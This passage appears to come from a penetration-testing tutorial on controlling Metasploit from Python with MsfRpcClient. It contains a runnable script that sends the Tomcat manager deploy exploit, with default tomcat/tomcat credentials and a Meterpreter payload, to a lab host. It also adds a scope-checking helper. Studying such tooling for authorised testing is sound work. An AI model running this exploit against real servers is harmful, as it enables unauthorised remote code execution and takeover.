Interacting with the Metasploit framework from Python

The MsfRpcClient class provides the core functionality to navigate through the Metasploit framework.

Like the Metasploit framework, MsfRpcClient is segmented into different management modules:

  • auth: Manages the authentication of clients for the msfrpcd daemon.
  • consoles: Manages interaction with consoles/shells created by the Metasploit modules.
  • core: Manages the Metasploit framework core.
  • db: Manages the backend database connectivity for msfrpcd.
  • modules: Manages the interaction and configuration of Metasploit modules (such as exploits and auxiliaries).
  • plugins: Manages the plugins associated with the Metasploit core.
  • sessions: Manages the interaction with the Metasploit meterpreter sessions.

Just like in the Metasploit console, you can retrieve a list of all the available modules, such as encoders, payloads, and exploits:

>>> client.modules.auxiliary
>>> client.modules.encoders
>>> client.modules.payloads
>>> client.modules.post

This will list the exploit modules:

exploits = client.modules.exploits

We can activate one of these exploits with the use method:

scan = client.modules.use('exploit', 'multi/http/tomcat_mgr_deploy')

As we did with python-msfrpc, with this module we can also connect to the console and run commands just as we do in msfconsole. We can do this in two ways. The first is to use the scan object after activating the exploit. The second is to use a console object to execute the commands in the same way that we do when we interact with msfconsole.

You can find the following code in the exploit_tomcat_maanger.py file in the pyMetasploit folder:

from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole

# Authenticate against the msfrpcd daemon
client = MsfRpcClient('password', user='msf')

# List every exploit module known to the framework
exploits = client.modules.exploits
for exploit in exploits:
    print(" %s" % exploit)

# First way: configure and run the module through the module object.
# The module type passed to use() is singular ('exploit').
scan = client.modules.use('exploit', 'multi/http/tomcat_mgr_deploy')
print(scan.description)
print(scan.required)
scan['RHOST'] = '192.168.100.2'
scan['RPORT'] = '8180'
scan['PATH'] = '/manager'
scan['HttpUsername'] = 'tomcat'
scan['HttpPassword'] = 'tomcat'
# The payload is passed to execute() rather than set as a module option
print(scan.execute(payload='java/meterpreter/bind_tcp'))

# Second way: send the same commands we would type in msfconsole
console = MsfRpcConsole(client)
console.execute('use exploit/multi/http/tomcat_mgr_deploy')
console.execute('set RHOST 192.168.100.2')
console.execute('set RPORT 8180')
console.execute('set PATH /manager')
console.execute('set HttpUsername tomcat')
console.execute('set HttpPassword tomcat')
console.execute('set payload java/meterpreter/bind_tcp')
console.execute('run')
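Both approaches above take the same option values, so a single options dictionary can be validated once before it reaches either the module object or the console. The following is an added example, not code from the book or from pymetasploit: it checks RHOST against an engagement scope and builds the console command list without contacting msfrpcd. The names AUTHORISED_NETWORKS, in_scope and build_console_commands, and the scope value itself, are assumptions made for illustration.

```python
import ipaddress

# Constructed engagement scope (assumption): only the lab network is authorised.
AUTHORISED_NETWORKS = ["192.168.100.0/24"]


def in_scope(host, networks=AUTHORISED_NETWORKS):
    """Return True only if host is a literal IP inside an authorised network."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Hostnames are rejected: they can resolve to addresses outside the scope.
        return False
    return any(addr in ipaddress.ip_network(net) for net in networks)


def build_console_commands(module, options, networks=AUTHORISED_NETWORKS):
    """Turn an options dict into 'use'/'set' console lines, refusing bad input.

    Hypothetical helper: it only builds strings and never adds 'run'.
    """
    rhost = options.get("RHOST")
    if rhost is None or not in_scope(rhost, networks):
        raise ValueError("RHOST %r is outside the authorised scope" % (rhost,))
    for name, value in options.items():
        # The console is line based, so a newline inside a value would be
        # read as an extra, unreviewed command.
        if any(ch in str(value) for ch in "\r\n"):
            raise ValueError("line break in option %s" % name)
    commands = ["use %s" % module]
    commands += ["set %s %s" % (name, value) for name, value in options.items()]
    return commands


if __name__ == "__main__":
    # Values taken from the listing above.
    opts = {"RHOST": "192.168.100.2", "RPORT": "8180", "PATH": "/manager"}
    for line in build_console_commands("exploit/multi/http/tomcat_mgr_deploy", opts):
        print(line)
```

The same validated dictionary can be applied to the module object with scan[name] = value for each entry.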
